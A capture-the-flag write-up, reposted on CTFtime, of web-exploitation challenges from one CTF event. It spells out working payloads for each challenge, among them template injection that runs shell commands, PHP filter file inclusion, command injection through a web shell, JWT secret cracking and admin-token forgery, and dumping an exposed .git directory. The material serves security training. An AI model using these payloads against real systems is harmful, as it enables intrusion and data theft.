CTFtime.org

10 Character Web Shell

by Ne0Lux-C1Ph3r / Ne0Lux-C1Ph3r

Tags: exec web 

Rating:

<h1 align="center">Web Exploitation</h1>

<h3>Hot Access 70 points</h3>

Access to all the latest modules, hot off the press! What can you access?

Connect here: http://jh2i.com:50016


http://jh2i.com:50016/?m=modules/../.htaccess

        <pre> <Directory /var/www/html>

    Options Indexes FollowSymLinks MultiViews
    AllowOverride All
    Order allow,deny
    allow from all
 
 </Directory>

  <Directory /var/www/html/sshh_dont_tell_i_hid_the_flag_here>
    
    AllowOverride All
 
 </Directory></pre>

http://jh2i.com:50016/sshh_dont_tell_i_hid_the_flag_here/flag.txt
LLS{htaccess_can_control_what_you_access}

Flag: LLS{htaccess_can_control_what_you_access}

<h3>PHPJuggler 80 points</h3>

PHP is here to entertain again! They’ve shown you magic tricks, disappearing acts, and now… juggling!

Connect here: http://jh2i.com:50030.

<p align="center"><img src="../Files/juggler.png"></img></p>

Php Type Juggling strcmp:

submit POST requests with flag[]=flag
Warning: strcmp() expects parameter 1 to be string, array given in /var/www/html/index.php on line 6
You got it! That's the correct flag!
LLS{php_dropped_the_ball_again}

Flag: LLS{php_dropped_the_ball_again}

<h3>Magician 80 points</h3>

Show me a hat trick!

Connect here: http://jh2i.com:50000

<p align="center"><img src="../Files/magician.png"></img></p>

Magic Hash as whihehat security or 247CTF!!!:

hash ==> 0e908377363673038390833004129775
password ==> f789bbc328a3d1a3e4UPoL

Flag: LLS{magic_hashes_make_for_a_good_show}

<h3>GLHF 90 points</h3>

LMFAO! FLAG PLZ, THX!

Connect here: http://jh2i.com:50014

Local file inclusion: LFI:

http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=index

<?php
    
    
    if ( ! isset($_GET['page']) ){

        echo("we got nothing!");
        header('Location: /index.php?page=home');
    }

    else{

        include(str_replace('.php', '', $_GET['page']) . ".php" );
    }
?>  

http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=FLAG

<!DOCTYPE html>

<html>
    <head>
        <title> PHPLFIXYZ </title>
    </head>
    <body>

    <h1> FLAG???? </h1>

    <h1> WTF, PLZ??? </h1>

    <!-- SRY PHP LFI NBD -->

    </body>
</html>
<?php
    /*
    // _______________________________________________________________

                        LLS{lmfao_php_filters_ftw}

    // _______________________________________________________________
    */
?>

Flag: LLS{lmfao_php_filters_ftw}

<h3>MASK 90 points</h3>

Take off your mask.

Connect here: http://jh2i.com:50023.

<p align="center"><img src="../Files/mask.png"></img></p>

Server Side Template Injection:

test ==> {{7*7}} response 49

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

<p align="center"><img src="../Files/mask0.png"></img></p>

<p align="center"><img src="../Files/mask1.png"></img></p>

{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}

Flag: LLS{server_side_template_injection_unmasked}

<h3>JaWT 90 points</h3>

Check the admin's scratchpad!

Connect here: http://jh2i.com:50019/

<p align="center"><img src="../Files/jawt.png"></img></p>

Challenge as PicoCTF and use crackjwt.py

FOR JOHN
python crackjwt.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc" /media/sf_D_DRIVE/WORDLISTS/rockyou.dic
Cracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc
1648it [00:00, 6560.78it/s]
('Found secret key:', 'fuckit')

FOR ADMIN
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.qfSqP1u-gAhG6r8Vfb31Fi5WkjYCxjRKhFEcLCde8O0

Change value of cookie jwt

 Hello admin!

Here is your JaWT scratchpad!

LLS{jawt_was_just_what_you_thought}

Flag: LLS{jawt_was_just_what_you_thought}

<h3>10 Character Web Shell 100 points</h3>

Only 10 char--

Connect here: http://jh2i.com:50001.

<?php

    $c = $_GET[c];

    if(strlen($c) < 10){
            echo shell_exec($c);
    }else{
            echo "too long!";
    }
    highlight_file(__FILE__);
?>

http://jh2i.com:50001/?c=cat%20flag*

<p align="center"><img src="../Files/web.png"></img></p>

Flag: LLS{you_really_can_see_in_the_dark}

<h3>Dairy Products 100 points</h3>

There is a new advertising campaign on the classic dairy company’s website. You need to steal their latest product.

Connect here: http://142.93.3.19:50008

Just use wget because gitdumper.sh don't download repo.

wget -r --no-parent http://142.93.3.19:50008/.git/

git status
git --no-pager log -p | grep LLS{
LLS{you_gitm_gotm_good_partner}

Flag: LLS{you_gitm_gotm_good_partner}

<h3>GET Encoded 125 points</h3>

I don't GET this%21 Do you%3F

Connect here: http://jh2i.com:50013

robots.txt with /?debug

<p align="center"><img src="../Files/encod.png"></img></p>

http://jh2i.com:50013/?%73ystem=ls

flag_that_you_could_never_guess.php
index.php
robots.txt

Machines hunt for more than humans do.

http://jh2i.com:50013/?%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php

<pre><?php
    // the flag is: LLS{i_gotcha_url_encoding}
?>
</pre><p>Machines hunt for more than humans do.</p>

Flag: LLS{i_gotcha_url_encoding}

<p align="left"><a href="https://github.com/Ne0Lux-C1Ph3r/WRITE-UP/blob/master/VirSecCon CTF/index.md">Return to the main menu</a></p>

Original writeup (https://github.com/Ne0Lux-C1Ph3r/WRITE-UP/blob/master/VirSecCon%20CTF/Web%20Exploitation/index.md).

Comments